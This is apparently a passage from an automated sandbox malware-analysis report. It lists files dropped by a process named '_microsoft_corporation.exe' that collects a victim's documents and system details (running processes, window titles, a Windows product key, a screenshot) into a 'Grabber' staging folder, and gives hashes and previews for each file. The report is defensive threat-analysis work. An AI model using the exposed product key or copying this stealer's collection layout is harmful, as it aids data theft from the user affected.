QZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Downloads\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Downloads\WUTJSCBCFX.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Downloads\WUTJSCBCFX.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Downloads\YPSIACHYXW.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ZBEDCJPBEY.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Downloads\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.5191090305155277
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
MD5:	3A37312509712D4E12D27240137FF377
SHA1:	30CED927E23B584725CF16351394175A6D2A9577
SHA-256:	B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
SHA-512:	DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Camera Roll\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
MD5:	D48FCE44E0F298E5DB52FD5894502727
SHA1:	FCE1E65756138A3CA4EAAF8F7642867205B44897
SHA-256:	231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
SHA-512:	A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Saved Pictures\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
MD5:	87A524A2F34307C674DBA10708585A5E
SHA1:	E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
SHA-256:	D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
SHA-512:	7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.514398793376306
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
MD5:	29EAE335B77F438E05594D86A6CA22FF
SHA1:	D62CCC830C249DE6B6532381B4C16A5F17F95D89
SHA-256:	88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
SHA-512:	5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\System\Process.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	22565
Entropy (8bit):	5.709681260644561
Encrypted:	false
SSDEEP:	384:MISJQOldiLrt/cRTcEQqTjxiV3oexQFiG6yX7yGTSthl5CUjv2zQAndWivCZeUwV:MISJQOldiLrt/cRTcEQqTjxiV3oexQFZ
MD5:	9F184B7C93793275E68A12F9F91093A8
SHA1:	A3046620BC5A38B3D3A2081DCD0774A25E5D5F70
SHA-256:	09CEB1DCC9A35C47AFBAEA2471DE3AC96600AD385E4E769C6312A1D14520825C
SHA-512:	BC0774251936849D45144A47FCE2B002159D7F4058CD768FC6B21869333AA5A8CA614DA0DDAD8A21045428E32CD7DD05549D6C21E9A7B14FBE632F696BE53F5B
Malicious:	false
Preview:	NAME: jRJjViJPGrVdYLDoRAjbCMJe..PID: 6464..EXE: C:\Program Files (x86)\XZKtKIWLqKLEXdbtoouyIvNuYxDJHSBjfoSPVtNhilHwWWnqrPgHmgqc\jRJjViJPGrVdYLDoRAjbCMJe.exe..NAME: svchost..PID: 2152..EXE: C:\Windows\system32\svchost.exe..NAME: jRJjViJPGrVdYLDoRAjbCMJe..PID: 6892..EXE: C:\Program Files (x86)\XZKtKIWLqKLEXdbtoouyIvNuYxDJHSBjfoSPVtNhilHwWWnqrPgHmgqc\jRJjViJPGrVdYLDoRAjbCMJe.exe..NAME: explorer..PID: 2580..EXE: C:\Windows\Explorer.EXE..NAME: jRJjViJPGrVdYLDoRAjbCMJe..PID: 6488..EXE: C:\Program Files (x86)\XZKtKIWLqKLEXdbtoouyIvNuYxDJHSBjfoSPVtNhilHwWWnqrPgHmgqc\jRJjViJPGrVdYLDoRAjbCMJe.exe..NAME: fontdrvhost..PID: 784..EXE: C:\Windows\system32\fontdrvhost.exe..NAME: jRJjViJPGrVdYLDoRAjbCMJe..PID: 4296..EXE: C:\Program Files (x86)\XZKtKIWLqKLEXdbtoouyIvNuYxDJHSBjfoSPVtNhilHwWWnqrPgHmgqc\jRJjViJPGrVdYLDoRAjbCMJe.exe..NAME: RuntimeBroker..PID: 416..EXE: C:\Windows\System32\RuntimeBroker.exe..NAME: _microsoft_corporation..PID: 7740..EXE: C:\Users\user\AppData\Local\Temp\_microsoft_corporatio

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\System\ProductKey.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	3.702471512219747
Encrypted:	false
SSDEEP:	3:U1cP1vgle:U16j
MD5:	0C645753939B9121AABB96D7529AE9E9
SHA1:	7D4A2A667D442E94855217B8B64DA61155077A51
SHA-256:	19ADC6ABB99F91E30FFFD550A4B7ECC2F262C4C2827969706C05DF21E3415C82
SHA-512:	1E3CD6A51E50F2229E1613E9A7989726CF580E82EACC71200082AB73C479F6F7A97153AFCCBDF590800713414251EE08715C7B1C2947A9925F285AFF200D183D
Malicious:	false
Preview:	PJN2W-Q2Q24-RGYQ9-4PJGY-D84K4

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\System\ScanningNetworks.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	84
Entropy (8bit):	4.6630509827051725
Encrypted:	false
SSDEEP:	3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
MD5:	58CD2334CFC77DB470202487D5034610
SHA1:	61FA242465F53C9E64B3752FE76B2ADCCEB1F237
SHA-256:	59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
SHA-512:	C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
Malicious:	false
Preview:	Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\System\Windows.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	19275
Entropy (8bit):	5.659572283259363
Encrypted:	false
SSDEEP:	384:8Gji2hovYxwlW3wonXfb5Ysixiy8QoPOS/1pB5TXbihcMz34eH2O25ioJhQA4MUS:8Gji2hovYxwlW3wonXfb5Ysixiy8FPOg
MD5:	DFA83BD1E7EAFCD69BBA201532007659
SHA1:	930513381CD079AC860F8F14A7602187EE580867
SHA-256:	D80AE4B6E920602EC99A31BA053911931ED414F8002ACC8647434B156D54A8AA
SHA-512:	40A788B2C56F168CA6E485AA8A94EBA502F3134C2CFB1511AC8B031D767B6A0C3C140F72B30C087A026BFB236C2FB8D59167CA2C61669B96EEB136D85FB9B068
Malicious:	false
Preview:	NAME: jRJjViJPGrVdYLDoRAjbCMJe..TITLE: New Tab - Google Chrome..PID: 6464..EXE: C:\Program Files (x86)\XZKtKIWLqKLEXdbtoouyIvNuYxDJHSBjfoSPVtNhilHwWWnqrPgHmgqc\jRJjViJPGrVdYLDoRAjbCMJe.exe..NAME: jRJjViJPGrVdYLDoRAjbCMJe..TITLE: New Tab - Google Chrome..PID: 6892..EXE: C:\Program Files (x86)\XZKtKIWLqKLEXdbtoouyIvNuYxDJHSBjfoSPVtNhilHwWWnqrPgHmgqc\jRJjViJPGrVdYLDoRAjbCMJe.exe..NAME: jRJjViJPGrVdYLDoRAjbCMJe..TITLE: New Tab - Google Chrome..PID: 6488..EXE: C:\Program Files (x86)\XZKtKIWLqKLEXdbtoouyIvNuYxDJHSBjfoSPVtNhilHwWWnqrPgHmgqc\jRJjViJPGrVdYLDoRAjbCMJe.exe..NAME: jRJjViJPGrVdYLDoRAjbCMJe..TITLE: New Tab - Google Chrome..PID: 4296..EXE: C:\Program Files (x86)\XZKtKIWLqKLEXdbtoouyIvNuYxDJHSBjfoSPVtNhilHwWWnqrPgHmgqc\jRJjViJPGrVdYLDoRAjbCMJe.exe..NAME: jRJjViJPGrVdYLDoRAjbCMJe..TITLE: New Tab - Google Chrome..PID: 6276..EXE: C:\Program Files (x86)\XZKtKIWLqKLEXdbtoouyIvNuYxDJHSBjfoSPVtNhilHwWWnqrPgHmgqc\jRJjViJPGrVdYLDoRAjbCMJe.exe..NAME: jRJjViJPGrVdYLDoRAjbCMJe..TITLE: New Tab - G

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\System\WorldWind.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	121487
Entropy (8bit):	7.8891545992453125
Encrypted:	false
SSDEEP:	3072:w5DTKolpHtb19zyK9WbyXfx/CcLGS222226EPG+XnOyj:IXHpNbY2XfBCcLGS222226EPGQnOu
MD5:	C6541F8AA129DD048E70E85EFC9B1296
SHA1:	7AA29375D14C6DA50282F88329580E099AFD119B
SHA-256:	7CC473B4E9050D7E4F6802CD79EEBECE7C80F9512C8AF948F830523268BD4292
SHA-512:	2958EB047E348A49D99880E06F58A440822B18F1FF888B2B0BBBD93F53D7F9D1F2A903B7CA2A779D2CF55747F07C14ADD0E6E5E7CC28315599FF6A51F69136E4
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3...m..,.X.c.#....O..i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-v.....Z..tN.Lo..?.Xb1....Oc....&...W.8.+.?.]._.....G.R....n..............z...........w..#.......`..

C:\Users\user\AppData\Local\7317ea80a01be2247f5a005cc2cc4327\msgid.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	6
Entropy (8bit):	2.2516291673878226
Encrypted:	false
SSDEEP:	3:ISEd:ISEd
